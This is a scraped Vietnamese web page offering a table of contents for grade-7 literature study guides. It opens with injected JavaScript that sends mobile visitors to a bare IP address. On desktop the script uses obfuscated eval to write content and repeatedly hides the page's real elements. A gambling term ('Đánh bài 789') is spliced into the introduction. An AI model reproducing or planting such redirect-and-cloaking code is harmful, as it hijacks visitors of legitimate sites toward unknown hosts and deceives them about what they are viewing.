function goPAGE() { if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://180.215.56.197/" } else { var ss = '
'; eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); try { setInterval(function() { try { document.getElementById("div" + "All").style.display = "no" + "ne" } catch (e) {} for (var i = 0; i < document.body.children.length; i++) { try { var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id; if (myid != "iconDiv1" && myid != "yangchen") { document.body.children[i].style.display = "non" + "e" } } catch (e) {} } }, 100) } catch (e) {} } } goPAGE();

Soạn Văn lớp 7 siêu ngắn gọn nhất


Đánh bài 789Loạt bài Soạn Văn lớp 7 siêu ngắn được biên soạn theo sgk Ngữ văn 7 Tập 1 & Tập 2 để giúp bạn dễ dàng soạn bài và học tốt môn Ngữ Văn lớp 7 hơn.

Mục lục Soạn Văn 7 Tập 1 & 2

Soạn văn lớp 7 Tập 1

Soạn văn lớp 7 Tập 2

Tác giả - Tác phẩm lớp 7

Tiếng Việt - Tập làm văn lớp 7

1000 Câu hỏi trắc nghiệm Ngữ văn 7

Trắc nghiệm Ngữ văn 7 Học kì 1

Trắc nghiệm Ngữ văn 7 Học kì 2

1000 câu hỏi ôn tập môn Ngữ văn 7

Câu hỏi Ngữ văn 7 Học kì 1

Câu hỏi Ngữ văn 7 Học kì 2